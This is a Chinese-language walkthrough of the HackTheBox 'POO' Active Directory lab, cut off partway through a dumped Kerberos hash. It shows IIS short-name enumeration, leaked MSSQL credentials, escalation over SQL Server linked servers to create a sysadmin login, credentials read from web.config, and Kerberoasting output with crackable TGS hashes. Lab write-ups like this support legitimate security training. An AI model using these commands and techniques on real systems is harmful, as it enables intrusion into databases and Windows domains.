专业进攻行动#
通过eks和mrb3n
Professional Offensive Operations 是网络安全领域中一个正在崛起的名字。
最近,他们一直致力于将核心服务和组件迁移到提供尖端软件和硬件的最先进集群。
POO 旨在在配置有最新操作系统和技术的小型 Active Directory 环境中测试您在枚举、横向移动和权限升级方面的技能。
目标是破坏外围主机、提升权限并最终破坏域,同时沿途收集多个标志。
入口点:10.13.38.11
Recon#
信息收集#
通过 nmap 扫描后获得了 80 和 1433 端口,可以得到目标应该是 IIS 架构,使用 sqlserver 2017 数据库
使用 dirseacrh 对网站进行目录扫描
同时注意到 admin 目录是一个 401 跳转,使用了验证。
试了几个弱口令无果。
那么只剩下 ds_srtore 文件可以看了。
ds_store 利用#
李姐姐之前写过一款 ds_store 利用工具,在实战中我很少关注此东西,不过靶机就不要放过任何可利用面,来试一试。
我推荐项目地址:https://github.com/0xHJK/dumpall
[404] http://10.13.38.11/web.config web.config
[401] http://10.13.38.11/admin admin
[200] http://10.13.38.11/iisstart.htm iisstart.htm
[403] http://10.13.38.11/Templates Templates
[403] http://10.13.38.11/Themes Themes
[403] http://10.13.38.11/Images Images
[403] http://10.13.38.11/META-INF META-INF
[403] http://10.13.38.11/Uploads Uploads
[403] http://10.13.38.11/Plugins Plugins
[403] http://10.13.38.11/JS JS
[403] http://10.13.38.11/Widgets Widgets
[403] http://10.13.38.11/New folder New folder
[403] http://10.13.38.11/dev dev
[403] http://10.13.38.11/New folder (2) New folder (2)
[403] http://10.13.38.11/Themes/default Themes/default
[403] http://10.13.38.11/Images/icons Images/icons
[403] http://10.13.38.11/Images/buttons Images/buttons
[403] http://10.13.38.11/Widgets/Menu Widgets/Menu
[403] http://10.13.38.11/JS/custom JS/custom
[403] http://10.13.38.11/Widgets/Framework Widgets/Framework
[403] http://10.13.38.11/Widgets/Notifications Widgets/Notifications
[403] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1 dev/304c0c90fbc6520610abbf378e2339d1
[403] http://10.13.38.11/Widgets/CalendarEvents Widgets/CalendarEvents
[403] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc dev/dca66d38fd916317687e1390a420c3fc
[403] http://10.13.38.11/Widgets/Framework/Layouts Widgets/Framework/Layouts
[403] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db dev/304c0c90fbc6520610abbf378e2339d1/db
[403] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/include dev/304c0c90fbc6520610abbf378e2339d1/include
[403] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/core dev/304c0c90fbc6520610abbf378e2339d1/core
[403] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/include dev/dca66d38fd916317687e1390a420c3fc/include
[403] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db dev/dca66d38fd916317687e1390a420c3fc/db
[403] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/src dev/304c0c90fbc6520610abbf378e2339d1/src
[403] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/core dev/dca66d38fd916317687e1390a420c3fc/core
[403] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/src dev/dca66d38fd916317687e1390a420c3fc/src
[403] http://10.13.38.11/Widgets/Framework/Layouts/custom Widgets/Framework/Layouts/custom
[403] http://10.13.38.11/Widgets/Framework/Layouts/default Widgets/Framework/Layouts/default
[200] http://10.13.38.11/Images/iisstart.png Images/iisstart.png
但是经过解析后的资源都是 401,对现在的情况没有任何帮助。
IIS 短文件利用#
当没辙之后去看 80 端口,搜索了一下 IIS 现有的漏洞,用文章中的 IIS 短文件发现跑了一下。
参阅:https://www.freebuf.com/vuls/304741.html
└─# python3 iis_shortname_scan.py http://10.13.38.11/
Server is vulnerable, please wait, scanning...
[+] /d~1.* [scan in progress]
[+] /n~1.* [scan in progress]
[+] /t~1.* [scan in progress]
[+] /w~1.* [scan in progress]
[+] /ds~1.* [scan in progress]
[+] /ne~1.* [scan in progress]
[+] /te~1.* [scan in progress]
[+] /tr~1.* [scan in progress]
[+] /we~1.* [scan in progress]
[+] /ds_~1.* [scan in progress]
[+] /new~1.* [scan in progress]
[+] /tem~1.* [scan in progress]
[+] /tra~1.* [scan in progress]
[+] /web~1.* [scan in progress]
[+] /ds_s~1.* [scan in progress]
[+] /newf~1.* [scan in progress]
[+] /temp~1.* [scan in progress]
[+] /tras~1.* [scan in progress]
[+] /ds_st~1.* [scan in progress]
[+] /newfo~1.* [scan in progress]
[+] /templ~1.* [scan in progress]
[+] /trash~1.* [scan in progress]
[+] /ds_sto~1.* [scan in progress]
[+] /newfol~1.* [scan in progress]
[+] /templa~1.* [scan in progress]
[+] /trashe~1.* [scan in progress]
[+] /ds_sto~1 [scan in progress]
[+] Directory /ds_sto~1 [Done]
[+] /newfol~1 [scan in progress]
[+] Directory /newfol~1 [Done]
[+] /templa~1 [scan in progress]
[+] Directory /templa~1 [Done]
[+] /trashe~1 [scan in progress]
[+] Directory /trashe~1 [Done]
----------------------------------------------------------------
Dir: /ds_sto~1
Dir: /newfol~1
Dir: /templa~1
Dir: /trashe~1
----------------------------------------------------------------
4 Directories, 0 Files found in total
Note that * is a wildcard, matches any character zero or more times.
第一次扫描之后并没有很大的发现,对出现率最高的 /dev/304c0c90fbc6520610abbf378e2339d1 / 目录进行扫描。
扫描过后只发现了该目录的 ds 存在短文件漏洞,再我挨个扫描之后发现 DB 下面还存在该漏洞。
└─# python3 iis_shortname_scan.py http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db
Server is vulnerable, please wait, scanning...
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/p~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/po~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_c~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.t* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.tx* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt* [scan in progress]
[+] File /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt*
----------------------------------------------------------------
我现在就明白了,这个 txt 文件他有几个单词是 poo_co 的,因此只需要爆破这最后一个目录文件即可。
wfuzz#
wfuzz是 kali 的一款模糊 web 目录测试,用于枚举更多文件和目录。
─# wfuzz -z file,/usr/share/wordlists/dirb/big.txt --sc 200 -u http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt
Total requests: 20469
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000005138: 200 6 L 7 W 142 Ch "connection"
获得了一个文件名,connection。
http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt
Recon PWN#
SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r
Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}
获得了 flag 和一个账户密码。
#p00Public3xt3rnalUs3r
Deploy#
MSSQL#
利用之前得到的账号密码登录 1433 mssql 服务器。
查看当前权限#
SQL> SELECT is_srvrolemember('sysadmin');
-----------
0
查看存在几个用户#
SQL> SELECT name FROM master..syslogins
name
-------------------
sa
external_user
查看管理员权限是是哪个用户#
SQL> SELECT name FROM master..syslogins WHERE sysadmin = '1';
name
---------------------------------------
sa
比较离谱的是用 MDAT,MUDT 都打不开权限,刚好看到一篇文章。
https://www.freebuf.com/articles/system/267618.html
https://xz.aliyun.com/t/7534
前提是必须打开外部脚本,尝试我这个用户并无权限。
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 105: User does not have permission to perform this action.
mssql 共享提权#
在我一筹莫展的时候发现了此文章
https://www.sec-in.com/article/1270
然后我看了一下这篇文章,利用文章中的方法,获取到了另外一个共享。
可以从 SSMS 中的“服务器对象->链接服务器”菜单查看现有链接。或者,可以使用“sp_linkedservers”存储过程或通过发出查询“select * from master..sysservers”来列出它们。直接从“sysservers”表中选择是首选方法,因为它会披露更多有关链接的信息。
SQL Server有一个数据库链接功能。创建链接的数据库之间可以互相执行SQL这是一个非常正常的功能,但是错误的配置就会导致我们拿到权限。
所以就是 select * from master..sysservers
得到了两个服务器。
COMPATIBILITY\POO_CONFIG
COMPATIBILITY\POO_PUBLIC
此作者发布了三篇文章,其中
https://www.netspi.com/blog/technical/network-penetration-testing/how-to-hack-database-links-in-sql-server/ 是我找到最早讲这个的,我看不懂,但是我大受震撼。
如果启用了一个链接 (数据访问设置为 1),那么数据库服务器上的每个用户都可以使用该链接,而不管用户的权限是什么 (public、sysadmin 权限都没关系)
如果将链接配置为使用 SQL 帐户,则进行每个到目的地数据库连接的账户权限都为目的地数据库的权限。换句话说,服务器 A 上的公共用户可能以 sysadmin 的身份在服务器 B 上执行 SQL 查询。
查看当前主机#
SQL> select @@servername
--------------------------
COMPATIBILITY\POO_PUBLIC
看看有无链接主机#
SQL> select srvname from sysservers;
srvname
------------------------------
COMPATIBILITY\POO_CONFIG
COMPATIBILITY\POO_PUBLIC
我们链接着另外一个主机COMPATIBILITY\POO_CONFIG
查看当前 COMPATIBILITY\POO_CONFIG 的用户#
SQL> EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];
------------------------------
internal_user
同样看一下 COMPATIBILITY\POO_CONFIG 数据库中拥有 sysadmin 权限的用户是谁#
SQL> EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];
name
----------------
sa
————————————————
还是sa
身份窃取#
后我们让COMPATIBILITY\POO_CONFIG向COMPATIBILITY\POO_PUBLIC发出一个请求
SQL> EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
------------------------------
sa
权限已经变成 SA 用户了。
查询当前权限
SQL> EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
entity_name permission_name
------------------------------ ------------------------------
server CONNECT SQL
server SHUTDOWN
server CREATE ENDPOINT
server CREATE ANY DATABASE
server CREATE AVAILABILITY GROUP
server ALTER ANY LOGIN
server ALTER ANY CREDENTIAL
server ALTER ANY ENDPOINT
server ALTER ANY LINKED SERVER
server ALTER ANY CONNECTION
server ALTER ANY DATABASE
server ALTER RESOURCES
server ALTER SETTINGS
server ALTER TRACE
server ALTER ANY AVAILABILITY GROUP
server ADMINISTER BULK OPERATIONS
server AUTHENTICATE SERVER
server EXTERNAL ACCESS ASSEMBLY
server VIEW ANY DATABASE
server VIEW ANY DEFINITION
server VIEW SERVER STATE
server CREATE DDL EVENT NOTIFICATION
server CREATE TRACE EVENT NOTIFICATION
server ALTER ANY EVENT NOTIFICATION
server ALTER SERVER STATE
server UNSAFE ASSEMBLY
server ALTER ANY SERVER AUDIT
server CREATE SERVER ROLE
server ALTER ANY SERVER ROLE
server ALTER ANY EVENT SESSION
server CONNECT ANY DATABASE
server IMPERSONATE ANY LOGIN
server SELECT ALL USER SECURABLES
server CONTROL SERVER
已经获得最高权限了,那么为了方便,我选择添加一个用户。
添加 SA 用户#
EXECUTE('EXECUTE(''CREATE LOGIN admin1 WITH PASSWORD = ''''qwe123QWE!@#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
//创建密码
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''admin1'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
//创建用户
PWN#
python3 mssqlclient.py 'admin1:qwe123QWE!@#@10.13.38.11'
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
#列出数据库
SQL> SELECT name FROM master..sysdatabases;
name
------------------------------
master
tempdb
model
msdb
POO_PUBLIC
flag
#查看数据库flag
SQL> select table_name,table_schema from flag.INFORMATION_SCHEMA.TABLES;
table_name table_schema
------------------------------ ------------------------------
flag dbo
#查询表flag
SQL> select * from flag.dbo.flag;
flag
----------------------------------------
b'POO{88d829eb39f2d11697e689d779810d42}'
Ghost#
MSSQL 后渗透#
利用之前添加的账号,登录 MUDT 进行操作
收集 ipconfig 信息#
Windows IP Configuration
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.20.128.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::13c
IPv6 Address. . . . . . . . . . . : dead:beef::1001
IPv6 Address. . . . . . . . . . . : dead:beef::b9f9:e455:ae47:7753
Link-local IPv6 Address . . . . . : fe80::b9f9:e455:ae47:7753%5
IPv4 Address. . . . . . . . . . . : 10.13.38.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : dead:beef::1
fe80::250:56ff:feb9:1f8d%5
10.13.38.2
收集系统信息#
Host Name: COMPATIBILITY
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00520-27817-AA781
Original Install Date: 12/12/2019, 6:07:48 PM
System Boot Time: 11/28/2022, 10:58:37 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 4 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 16,383 MB
Available Physical Memory: 13,957 MB
Virtual Memory: Max Size: 18,815 MB
Virtual Memory: Available: 16,206 MB
Virtual Memory: In Use: 2,609 MB
Page File Location(s): C:\pagefile.sys
Domain: intranet.poo
Logon Server: N/A
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB4533013
[02]: KB4516115
[03]: KB4523204
[04]: KB4530715
Network Card(s): 2 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.13.38.11
[02]: fe80::b9f9:e455:ae47:7753
[03]: dead:beef::b9f9:e455:ae47:7753
[04]: dead:beef::1001
[05]: dead:beef::13c
[02]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet1
DHCP Enabled: No
IP address(es)
[01]: 172.20.128.101
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
收集进程信息#
mage Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 144 K
Registry 104 0 80,408 K
smss.exe 308 0 1,192 K
csrss.exe 416 0 6,400 K
wininit.exe 492 0 6,880 K
csrss.exe 500 1 4,800 K
winlogon.exe 564 1 18,580 K
services.exe 636 0 14,512 K
lsass.exe 644 0 22,708 K
svchost.exe 784 0 3,896 K
svchost.exe 804 0 16,392 K
fontdrvhost.exe 832 0 3,780 K
fontdrvhost.exe 836 1 4,300 K
svchost.exe 928 0 11,380 K
svchost.exe 976 0 7,328 K
svchost.exe 288 0 11,504 K
dwm.exe 408 1 49,304 K
svchost.exe 488 0 7,812 K
svchost.exe 484 0 7,892 K
svchost.exe 340 0 6,920 K
svchost.exe 920 0 8,456 K
svchost.exe 1048 0 6,056 K
svchost.exe 1088 0 8,052 K
svchost.exe 1132 0 16,184 K
svchost.exe 1164 0 9,724 K
svchost.exe 1292 0 13,244 K
svchost.exe 1328 0 5,760 K
svchost.exe 1368 0 11,964 K
svchost.exe 1384 0 23,504 K
svchost.exe 1536 0 9,032 K
svchost.exe 1548 0 12,340 K
svchost.exe 1572 0 9,228 K
svchost.exe 1580 0 5,684 K
svchost.exe 1608 0 15,744 K
svchost.exe 1708 0 5,824 K
svchost.exe 1820 0 9,072 K
svchost.exe 1940 0 8,348 K
svchost.exe 2020 0 7,784 K
svchost.exe 1336 0 6,688 K
svchost.exe 2076 0 23,268 K
svchost.exe 2144 0 9,688 K
svchost.exe 2216 0 7,200 K
svchost.exe 2224 0 12,812 K
svchost.exe 2420 0 9,708 K
spoolsv.exe 2464 0 16,436 K
svchost.exe 2596 0 10,868 K
svchost.exe 2612 0 12,584 K
svchost.exe 2624 0 86,144 K
svchost.exe 2632 0 7,920 K
svchost.exe 2676 0 8,532 K
msdtc.exe 2692 0 10,312 K
svchost.exe 2748 0 6,596 K
sqlbrowser.exe 2784 0 4,588 K
sqlwriter.exe 2848 0 7,924 K
svchost.exe 2856 0 6,320 K
svchost.exe 2864 0 8,612 K
svchost.exe 2876 0 5,576 K
VGAuthService.exe 2884 0 13,112 K
vmtoolsd.exe 2896 0 28,484 K
ManagementAgentHost.exe 2936 0 11,980 K
svchost.exe 2952 0 11,876 K
MsMpEng.exe 3008 0 221,180 K
svchost.exe 2056 0 14,436 K
svchost.exe 2408 0 12,864 K
svchost.exe 3236 0 12,640 K
WmiPrvSE.exe 3752 0 21,060 K
svchost.exe 3904 0 7,756 K
dllhost.exe 3912 0 13,716 K
NisSrv.exe 4424 0 9,920 K
sqlservr.exe 4692 0 398,724 K
sqlceip.exe 4708 0 56,476 K
sqlservr.exe 4716 0 565,080 K
sqlceip.exe 4724 0 56,596 K
Launchpad.exe 5316 0 26,116 K
SearchIndexer.exe 5500 0 24,672 K
svchost.exe 5800 0 10,120 K
LogonUI.exe 5860 1 50,288 K
svchost.exe 5200 0 25,788 K
svchost.exe 2488 0 12,544 K
svchost.exe 4884 0 22,392 K
svchost.exe 4280 0 17,248 K
svchost.exe 4172 0 5,960 K
svchost.exe 5748 0 8,964 K
svchost.exe 1232 0 10,192 K
WmiApSrv.exe 3820 0 6,720 K
SecurityHealthService.exe 1204 0 10,988 K
GoogleUpdate.exe 6760 0 3,472 K
wermgr.exe 1172 0 11,172 K
svchost.exe 780 0 13,076 K
svchost.exe 1420 0 6,304 K
TrustedInstaller.exe 2160 0 7,080 K
TiWorker.exe 6344 0 9,524 K
cmd.exe 5268 0 3,688 K
conhost.exe 116 0 10,968 K
tasklist.exe 1544 0 7,712 K
打印机提权#
考虑到是 2019 的机器,直接使用打印机提权。
有了 IIS 权限之后,再去读网站的 config 文件,IIS 翻文件必不可少。
这里踩坑了,刚开始猪鼻了。去读这个文件没反应。
后来经过一号噩梦的提醒,才懂得 dir type 这种类型的命令是需要 cmd /c 去执行的。
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<staticContent>
<mimeMap
fileExtension=".DS_Store"
mimeType="application/octet-stream"
/>
</staticContent>
<!--
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user
name="Administrator"
password="EverybodyWantsToWorkAtP.O.O."
/>
</credentials>
</forms>
</authentication>
-->
</system.webServer>
</configuration>
于是乎,拿到了第三个账号密码。
Foothold#
随后我在管理员桌面发现了另外一个 flag.txt
POO{ff87c4fe10e2ef096f9a96a01c646f8f}
这个相对较为简单
ROOT#
查询域用户#
net user /domain
The request will be processed at a domain controller for domain intranet.poo.
User accounts for \\DC.intranet.poo
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
krbtgt mr3ks p00_adm
p00_dev p00_hr
The command completed with one or more errors.
查询登录本机的域管理员#
"net localgroup administrators /domain"
The request will be processed at a domain controller for domain intranet.poo.
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.
当时这里卡了很久,各种导密码都导不出来。
SPN 服务#
查询 SPN 情况
Checking domain DC=intranet,DC=poo
CN=DC,OU=Domain Controllers,DC=intranet,DC=poo
TERMSRV/DC
TERMSRV/DC.intranet.poo
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC.intranet.poo
ldap/DC.intranet.poo/ForestDnsZones.intranet.poo
ldap/DC.intranet.poo/DomainDnsZones.intranet.poo
DNS/DC.intranet.poo
GC/DC.intranet.poo/intranet.poo
RestrictedKrbHost/DC.intranet.poo
RestrictedKrbHost/DC
RPC/43b68534-ef5d-4165-b582-b9381481315e._msdcs.intranet.poo
HOST/DC/POO
HOST/DC.intranet.poo/POO
HOST/DC
HOST/DC.intranet.poo
HOST/DC.intranet.poo/intranet.poo
E3514235-4B06-11D1-AB04-00C04FC2DCD2/43b68534-ef5d-4165-b582-b9381481315e/intranet.poo
ldap/DC/POO
ldap/43b68534-ef5d-4165-b582-b9381481315e._msdcs.intranet.poo
ldap/DC.intranet.poo/POO
ldap/DC
ldap/DC.intranet.poo
ldap/DC.intranet.poo/intranet.poo
CN=krbtgt,CN=Users,DC=intranet,DC=poo
kadmin/changepw
CN=COMPATIBILITY,OU=Servers,DC=intranet,DC=poo
WSMAN/COMPATIBILITY
WSMAN/COMPATIBILITY.intranet.poo
TERMSRV/COMPATIBILITY
TERMSRV/COMPATIBILITY.intranet.poo
RestrictedKrbHost/COMPATIBILITY
HOST/COMPATIBILITY
RestrictedKrbHost/COMPATIBILITY.intranet.poo
HOST/COMPATIBILITY.intranet.poo
CN=p00_hr,CN=Users,DC=intranet,DC=poo
HR_peoplesoft/intranet.poo:1433
CN=p00_adm,CN=Users,DC=intranet,DC=poo
cyber_audit/intranet.poo:443
Existing SPN found
powershell -c import-module c:\tmp\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat
Exception calling "GetNames" with "1" argument(s): "Value cannot be null.
Parameter name: enumType"
At C:\tmp\invoke-kerberoast.ps1:869 char:9
+ $UACValueNames = [Enum]::GetNames($UACEnum)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : ArgumentNullException
New-DynamicParameter : The term 'New-DynamicParameter' is not recognized as the name of a cmdlet, function, script
file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct
and try again.
At C:\tmp\invoke-kerberoast.ps1:873 char:9
+ New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNa ...
+ ~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (New-DynamicParameter:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
New-DynamicParameter : The term 'New-DynamicParameter' is not recognized as the name of a cmdlet, function, script
file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct
and try again.
At C:\tmp\invoke-kerberoast.ps1:894 char:13
+ New-DynamicParameter -CreateVariables -BoundParameters $P ...
+ ~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (New-DynamicParameter:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
TicketByteHexStream :
Hash : $krb5tgs$23$*p00_hr$intranet.poo$HR_peoplesoft/intranet.poo:1433*$C06D33DCAB08BAAD480BF83FEBF939
48$538CDC882F7EA25241E4488CF9CCD32FC3D0C9E8E856718767C9A33A2F63C7BF9F5FB4470FB1835D213BA0DCC4D4E
EB1D401737441125A815752183FBE0CB7AC09E927DB34508030AA0F4B600379B0006B299BF8841AF1D18999861BD4052
33DD5FDE7CE4250177072177FD3FDE5E7B8F97177DBA568CD8D04C4DDE8B364468B27EBE34B7E9383DEB62AC04B78126
326F5DCE4D93D8AD3460E27A4C4149E9D18E9A24447260ED5E63E37E3562B3795C0BEFE17D5D228AF4694135C92EB008
8AFA053BE03A1A14A8C6E17F17A98E5C6B76BFE7E886B107186C80FC457A138D53D49284D68B3200016570B8AB2168BD
0C190799C6A0CC0DC430E5B2B2F3832DA5C6610312FBC5CC41531268AD9DAD8D1035212B11A8CF3FBBD37D33D2327845
4B1B73D7A3C4EE415265C50FEE306ADB7D75CF41DA96B009C803B7298D14A63607711AA2BBB93DCA5F2CFA7205FE947C
196201426D63FAEFF5865C30A2B3B12CA147FDED3ADF0D78A84A4AA48A204C7A442A445580D4702FC14A8A0564E57A8E
4B6AC0742018C2EA04D9103F27438535C12A958FD6CAB16E52922540707E3DF206298A1BA031FAA2F0074DC4E2F23753
348A0CE6771B4C0DBC8B586F6D2F5D9B61E0086F72B48FA4217A07A0B366E2C0999127981DA1D8CBDDD48E7798C4ED5D
C055FF305F1D1DF56D5ECB38A73784C0DDC59E6B4DAA8ACAD220A1144CBF0BB30FF68EEA0C424B4B0754FC45FB57373B
C10CB18FDEB65BFE6FD9D8900BC42911CD250DA3C63A0DC3B4DD396B901496405CED0232F1E8F40544858B73A4D173CF
DFB8698CD32E8AAC27DA3C190AFB4216C554B14D64CAE3A3F435F6D0C4E72949D6EA12B3E39BBDADD83CC00DE78B4E3C
054CF6F35AB5DAB1B7E0A2FE8B790E44E5CB852FD1F3E8E86B0FA1F8755E694EB8E86AC758B0CB40BB66168405DA8ADC
456D9E423B1C8F0A1DB4A84626B9EDEE432D14C21E983E2BF58908C49FF9C69C488C160010D09535F837BFBC49D4A905
6BCBD07C3CD53B5833C32C34AA30C5045A63577FF376727E0F240D52F8755AFB9197890300CB44EBC26A483CFE255659
992A0B30FE3E05E0EEA8B0E6E98B7A0FE4EFA6342FEBE2684DFB1CC7C5F4FA8448443D719FCA151F18EE90B959AB7FBA
482EF176381A0C40AE337C4E2EB49A025CF0231B6B7397B82D54370AB4D94EACFF06DA99978D6A9CB9BED472147C2809
AB29D5F2441A31BA983BC89B274A701F3D2E936CAA6FE73F93B640620BF6BAC931B0A26292D2A93FF7470B31BCCCD712
AE49D0B627C20672C334A119C03C4F8485B09DFF2BD19EDA902E6626BA3BBA80A16C220A9EB804C9C7055C507FA915DF
A1FAECA6166DC5BEBFF6E28D75E06A1A52F49BE5DC775D85D5046CFE70E7B05FC63CF3FE495EC74718D8BC784BB07986
0F1C34383F09E35FF047EDCEA254D3C29B176A15FF77C0E174563B2B95EF98ECCEB5BF85813DB2CEA83E78670388A
SamAccountName : p00_hr
DistinguishedName : CN=p00_hr,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : HR_peoplesoft/intranet.poo:1433
TicketByteHexStream :
Hash : $krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$3EB841F0EF3ED736B7B4109888E0C523
$88CFB8F25C53E1CE383D0F26542BAF3C899C9178A3C20A00934E9FE5F96D2C52B375DA51D714E533FA84EC033A8AA17
FBD6F3B4577702A6E60F08092EB9E1E6816A21DE22E85048608313FB7D717BA3E7065815C415B52A09E54D245B621C9B
0EAD4CA06FC9D226B3D1451572BBBAD5B17DDFB747C294C87DBFBA211FCB26A33151519A27BFAA9F96F4176F0C681FCF
7F080FA6CE3203059EC14A9CD9D242F8730F090D1FC031F00F2DECEA34AC76133AE8B336054D1DE48B2524227F34C6BE
6D4E8E64AFEFD6FBE0D2F7E5FCB540EBD03D238E63B88F0874F947D779B53CD5AAEC71368F3D7F123E919A4E9B72A220
D5143215D92F435846BF0DBD5327054769FC9FE1C8112A906646AC4C69816A663CF99E8B54A879C62D4295DC9D4AAF70
C778D298D0C59E015AD8C7D664F84A150C96D61DC29C9A07A01B9B7EB87254AE681651FACA6F3CDE7E8F6AD0F07F187F
00E2B289CB7373FB14DC2A6E0F7E22F18597586F1A145C50BD4A75C51821D42DE54B87E106A57891FAEE125B15A74BB6
9CCB6BBF2AE84B560DE1B82350664C8009EF59D8A613DAED8ED48820F87739BFE1CB154AD6E164D93E34D562F08704D5
D3BEB51E72984ED9A0B7A85724248CFACAD778A81820ABA8EC75CF6557D4D0668FD976D5F47D6A56CE9AECE7F715E902
9D2736720582BEE47FDFB5817CD14AD79ED7FD7F4D5EA9ABA345B18343CCB1130E1182D426345087B9773C2A82FB9B1E
